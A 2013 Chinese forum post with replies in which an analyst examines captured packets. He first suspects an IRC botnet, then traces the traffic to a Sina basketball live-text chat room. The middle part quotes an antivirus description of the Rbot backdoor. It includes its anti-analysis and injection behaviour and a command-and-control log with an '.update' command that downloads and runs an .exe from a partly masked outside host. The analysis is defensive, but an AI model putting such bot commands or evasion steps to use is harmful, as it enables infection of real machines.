虚惊一场，原来是它惹的祸

xxx314 · 发表于 2013-4-9 11:41:45

本帖最后由 xxx314 于 2013-4-9 12:38 编辑

背景介绍：
一天晚上，我走在回家的路上，突然熟悉的手机铃声响起了。。。。。。
看到备注的那个名字，以前实验室滴妹子打电话来了。。。。。。。猜想估计没啥好事。。。。。。
接起电话，那头说了xxx314师兄，我们这边有几个数据包，感觉好诡异，你帮我们分析分析咯，然后我一怔窃喜啊。。。。。。又来业务了，一个字：爽！可以见到新的数据类型了。。。。。。
然后简单问了问好久产生的？在哪点抓取的数据包？是个人本地pc还是服务器上面？等等相关的问题。。。。。。。
背景介绍完毕！
接下来切入正题。。。。。。。、

环境描述：

就20多台PC通过服务器上网，连接一个交换机。。。。。。后面路由情况不明。。。。。。

分析开始：

让师妹发来数据包，╮(╯▽╰)╭，只是发来一个数据包。。。。。。无语中，好吧，既然发了一个也就先分析着走吧。。。。。。

打开数据包，先看看大小吧。。。。。

上图所示，总流量也就8K多一点，数据包的个数只有99个，在数据包大小分布上，也还算正常，在tcp同步发送和同步确认发送上面也是很正常的。。。。。。

接着看看协议，如下图所示。。。。。只有http协议，估计做了过滤了滴。。。。。

打开tcp会话列表，在数据流中，可以看到诸如user和pass等等比较敏感信息，还有一些疑似账号和密码的东西。。。。。
并且分析其中的下面的数据流，对数据流的格式特征做了一些分析，感觉以前似曾相识呢，貌似在哪见过（ps：不是大明湖畔。。。。。。）

突然，一个念头闪现。。。。。。。irc僵尸。。。。。。。对，就是irc僵尸以前就有过这样的数据特征，接下来我去查了查irc僵尸的一些资料
发现以前的一个irc的控制的（科普科普），如下所示：

病毒名称： Backdoor/Win32.Rbot.kti
病毒类型：
后门
文件 MD5： 71A95D2E81C84B3560CE0714195CC635
公开范围：
完全公开
危害等级： 4
文件长度： 108,544 字节
感染系统： Windows98以上版本
开发工具： Borland Delphi 6.0 - 7.0
病毒描述

该病毒文件为僵尸后门类，该病毒对数据资源进行了加密处理，病毒运行后查找标题为"The Wireshark Network Analyzer"（抓包工具）的窗口，找到之后向该窗口发送WM_CLOSE消息并关闭该窗口，遍历进程查找filemon.exe、 regmon.exe、procmon.exe相关进程，找到含有以上进程后病毒则退出，遍历进程查找并结束Ollydbg.exe进程，创建病毒进程，
读取病毒创建进程的基址，申请内存空间，将病毒数据写入到创建的进程内存当中，调用函数恢复进程线程句柄使进程正常运行，将自身文件拷贝到临时目录下运
行，遍历进程查找多款安全软件进程找到后将其结束，连接网络请求多个网页数据下载病毒文件到本地并隐藏运行

行为分析-网络行为
1、连接IRC服务器等待控制
协议：TCP
连接服务器名：irc.ef***.com
域名或IP地址：
70.32.35.**：81
加入的 IRC 频道名：
JOIN #xx32
用户名：Ulfried
对目标主机的操作：

USER SP2-246 * 0:A-738DF22C9CA04

NICK[00_CHN_XP_6900486]

:irc.ef***.comNOTICE AUTH :*** Looking up your hostname...
:irc.ef***.comNOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:irc.ef***.com 001[00_CHN_XP_6900486]
:irc.ef***.com 002[00_CHN_XP_6900486] : M0dded by uNkn0wn Crew
:irc.ef***.com 003[00_CHN_XP_6900486]
:irc.ef***.com 004[00_CHN_XP_6900486] : www.uNkn0wn.eu - iD@uNkn0wn.eu
:irc.ef***.com 005[00_CHN_XP_6900486]
:irc.ef***.com 005[00_CHN_XP_6900486]
:irc.ef***.com 005[00_CHN_XP_6900486]
:irc.ef***.com 422[00_CHN_XP_6900486] :MOTD File is missing
:[00_CHN_XP_6900486]MODE [00_CHN_XP_6900486] :+iwG
MODE[00_CHN_XP_6900486] -ix
JOIN #xx32
MODE[00_CHN_XP_6900486] -ix
JOIN #xx32
MODE[00_CHN_XP_6900486] -ix
JOIN #xx32
MODE[00_CHN_XP_6900486] -ix
JOIN #xx32
:[00_CHN_XP_6900486]!SP2-246@221.207.255.**JOIN :#xx32
:irc.ef***.com 332 [00_CHN_XP_6900486]#xx32 :.flushdns |.down -S |.update -S |.update http://94.76.194.***/33.exec9h8j9a7n7m9.exe c9h8j9a7n7m9
:irc.ef***.com 333[00_CHN_XP_6900486] #xx32 j 1269606912
PRIVMSG #xx32:update; File download: 148.0KB to: C:\DOCUME~1\a\LOCALS~1\Temp\eraseme_75721.exe@ 37.0KB/sec.
:irc.ef***.com 404[00_CHN_XP_6900486] #xx32 :You must have a registered nick (+r) to talk on thischannel (#xx32)
QUIT gettin new bin.
ERROR :ClosingLink: [00_CHN_XP_6900486][221.207.255.58] (Client hat die Verbindung getrennt)
连接：http://94.76.194.***/33.exe下载病毒文件
连接网络访问以下网址：
GET/proxyworld/azenv.php HTTP/1.1
Host:membres.lycos.fr
Cache-Control:no-cache
GET/proxyworld/azenv.php HTTP/1.1
Host:membres.multimania.fr
Cache-Control:no-cache
Connection:Keep-Alive
GET/proxyworld/azenv.php HTTP/1.1
Host:membres.multimania.fr
Cache-Control:no-cache
Connection:Keep-Alive

这时候，心里有点小高兴，感觉有眉目了。。。。。。。接着，小师妹发来第二个和第三个数据包，打开一看，顿时笑了。。。。在其中的数据流中，居然有什么韦德~~中投不进，哈斯勒姆，4犯了，这个明显是那种直播间的这种信息，在线直播，并且还看到了Sina的字样，更转变了我的思维角度，猜想多半是由于他们网内有谁在看这个篮球直播比赛（ps：不好用视频—把网速占多了，只好网页这种文字描述看比赛，以前我们上课的时候还是搞过。。。。只是用手机看。。。。），如下图所示。。。。。。

查看一下时序图，如下图所示：

看这个时序图，第一个三次握手，然后主动连接（客户端这边建立连接发起数据验证，猜测估计是这种直播间本来服务器压力就比较大了，给每个请求都响应一下的话负荷会更大，直接请求方给请求验证，不需要服务器端开始给ack等，毕竟直播间这种一般不会存在好大的可靠性呀什么的，只要保持信息的及时推送就好，这个只是个猜测。。。。。毕竟原因可能是其他如担心攻击呀之类的等等）

思路有了，然后就是去找找具体是新浪的哪种直播引起的，毕竟前面都是一个猜想。。。。。。
首先我去查了查IP地址，看看是否是新浪的
先使用了nslookup查查呢，第一次居然timed out了。。。。。再来一次。。。。。。居然没找到。。。。。如下图所示：

换个站点来吧。。。。。如下图所示

怎么是这家伙。。。。。好像是一个代理的地点。。。。。没查到有多大用的信息。。。。。。

然后想想怎么查呢？突然意识到，如果是有这种如韦德~~中投不进，哈斯勒姆，4犯了这种数据的，干嘛不直接在网上查查这样的数据呢？一般是可以查到的。。。。。
然后果断搜索了几条这样的数据，嘿，还真有有效信息出来。。。。。ps：时间也是最近的。。。。。

进这个站点看了看。。。。。。发现了其中的一个聊天室。。。。。。果然有戏。。。。。。可惜了，今天没直播。。。。。不过还是进入其中的聊天室进去看看（ps：抓包也在跟进中）

然后关闭了，查看数据包，也发现了如下图所示信息（小师妹给的包中还是有这个关闭的操作数据。。。。。）

最后问题解决。。。。。。虚惊一场！

总结：开始的时候，由于只有一个数据包，影响了判断，以为是那种类似于irc僵尸的。。。。。不过也还是好，复习了一下irc僵尸的知识点。。。。。。
后面看到一些关键的数据，然后分析角度就转变了，最后验证，结论：虚惊一场！

分析完毕！

Csna：xxx314
2013.4.9

dalin · 发表于 2013-4-9 13:19:51

哇！！！太棒了辛苦楼主！！！

IT精英 · 发表于 2013-4-9 13:27:39

给力！！！GOOD 斑竹

gkgly · 发表于 2013-4-9 20:19:31

原来如此。。。。

anny00784 · 发表于 2013-4-15 16:51:25

写的不错，可读性加强，学习了。

briwind · 发表于 2013-4-30 06:50:17

master就是master! 牛人一个,什么时候我们才能学会呢?哈哈

612731 · 发表于 2013-5-21 01:09:57

楼主牛人一个啊支持一下。。

avengert · 发表于 2013-6-10 02:59:43

这……考试题啊。

xxx314 · 发表于 2013-6-12 08:43:34

8# avengert

什么考试题？

wdyy · 发表于 2013-7-11 06:08:55

好文~ 谢谢斑竹！

虚惊一场，原来是它惹的祸

评分

浏览过的版块